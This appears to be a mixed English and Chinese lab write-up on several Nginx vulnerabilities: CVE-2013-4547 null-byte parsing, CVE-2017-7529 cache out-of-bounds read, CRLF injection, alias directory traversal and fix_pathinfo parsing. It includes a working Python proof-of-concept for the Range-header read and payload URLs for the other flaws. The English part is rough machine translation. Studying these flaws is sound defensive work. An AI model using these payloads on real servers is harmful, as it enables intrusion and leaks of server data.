Nginx Parsing Vulnerability (CVE-2013-4547)
- Affects Version: Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7
- Vulnerability Analysis of
pathinfo is off by default, only the .php extension will be sent to the fastcgi analytical
principle CVE-2013-4547 is through illegal character spaces and off character (\ 0) will lead to a finite state machine when parsing URI Nginx chaos, harm is allow an attacker to bypass the space through a non-coding extension limit. When we ask 1.gif [0x20] [0x00] .php , Nginx think 1.gif [0x20] suffix is .php, put 1.gif [0x20] as php parsing, resulting Parsing Vulnerability - Vulnerability reproduce
upload a normal picture, image links get access picture is normal
to normal picture suffix is added [0x20] upload, visit the link does not exist 192.168.232.128:8080/uploadfiles/1.jpg found 404 images, 404 by Nginx given access 192.168.232.128:8080/uploadfiles/1.jpg[0x20], pop-up to download the picture, the picture does not resolve
the contents 2.jpg write phpinfo upload the same suffix by a space
and then access 2.jpg [0x20 ] [0x00] .php
with brup modify Hex, 00, 00 and 20 represent 00 into a truncated
discovery has resolved to PHP
Linux file can end with a space, in Windows, the file name can not end with a space, so Windows encounters file name "test.jpg" will automatically remove the last space, equivalent to the visit "test.jpg", for this reason, the vulnerability in Windows will be very easy to use.
Reference links
https://blog.werner.wiki/file-resolution-vulnerability-nginx/
http://www.91ri.org/9064.html
https://vulhub.org/#/environments/nginx/CVE-2013 -4547 /
Nginx bounds read Caching Vulnerability (CVE-2017-7529)
- Affects Version: Nginx 0.5.6 - 1.13.2
- 漏洞简析
Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别是静态文件。缓存的部分存储在文件中,每个缓存文件包括“文件头”+“HTTP返回包头”+“HTTP返回包体”。如果二次请求命中了该缓存文件,则Nginx会直接将该文件中的“HTTP返回包体”返回给用户。
如果我的请求中包含Range头,Nginx将会根据我指定的start和end位置,返回指定长度的内容。而如果我构造了两个负的位置,如(-600, -9223372036854774591),将可能读取到负位置的数据。如果这次请求又命中了缓存文件,则可能就可以读取到缓存文件中位于“HTTP返回包体”前的“文件头”、“HTTP返回包头”等内容。 - 漏洞复现
可见,越界读取到了位于“HTTP返回包体”前的“文件头”、“HTTP返回包头”等内容。
如果读取有误,请调整poc.py中的偏移地址(605)。
poc.py文件内容
#!/usr/bin/env python
import sys
import requests
if len(sys.argv) < 2:
print("%s url" % (sys.argv[0]))
print("eg: python %s http://your-ip:8080/" % (sys.argv[0]))
sys.exit()
headers = {
'User-Agent': "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240"
}
offset = 605
url = sys.argv[1]
file_len = len(requests.get(url, headers=headers).content)
n = file_len + offset
headers['Range'] = "bytes=-%d,-%d" % (
n, 0x8000000000000000 - n)
r = requests.get(url, headers=headers)
print(r.text)参考文章
https://vulhub.org/#/environments/nginx/CVE-2017-7529/
https://developer.mozilla.org/zh-CN/docs/Web/HTTP/Range_requests
Nginx 配置错误导致漏洞
CRLF注入漏洞
- 漏洞简析
nginx中配置路径跳转使用了$uri或$document_uri,$uri 和 $document_uri表示的是解码以后的请求路径,导致传入%0a%0d即可引入换行符,造成CRLF注入漏洞 漏洞复现
访问http://your-ip:8080/%0a%0dSet-Cookie:%20a=1,用burp抓包发现Set-Cookie注入成功
目录穿越漏洞
- 漏洞简析
Nginx在配置别名(Alias)的时候,如果忘记加/,将造成一个目录穿越漏洞。
错误的配置文件示例(原本的目的是为了让用户访问到/home/目录下的文件):
location /files {
alias /home/;
}当我们访问/files../时,nginx实际处理的路径时/home/../,从而实现了穿越目录。
漏洞复现
访问http://your-ip:port/files../
解析漏洞
- 漏洞简析
如果将nginx.conf配置成把.php后缀的文件交给fastcgi处理,当这个文件(.php)不存在并且php.ini配置文件中cgi.fix_pathinfo=1(如果当前路径不存在则采用上层路径),这是fastcgi处理.php上一级的文件
漏洞复现
访问含有phpinfo的图片http://192.168.232.128/uploadfiles/nginx.png,发现没有解析
在url中文件后加上/.php,如:http://192.168.232.128/uploadfiles/nginx.png/.php,发现已经解析成php文件
修复方式
cgi.fix_pathinfo的值设为0,php-fpm.conf中的security.limit_extensions的值设为.php
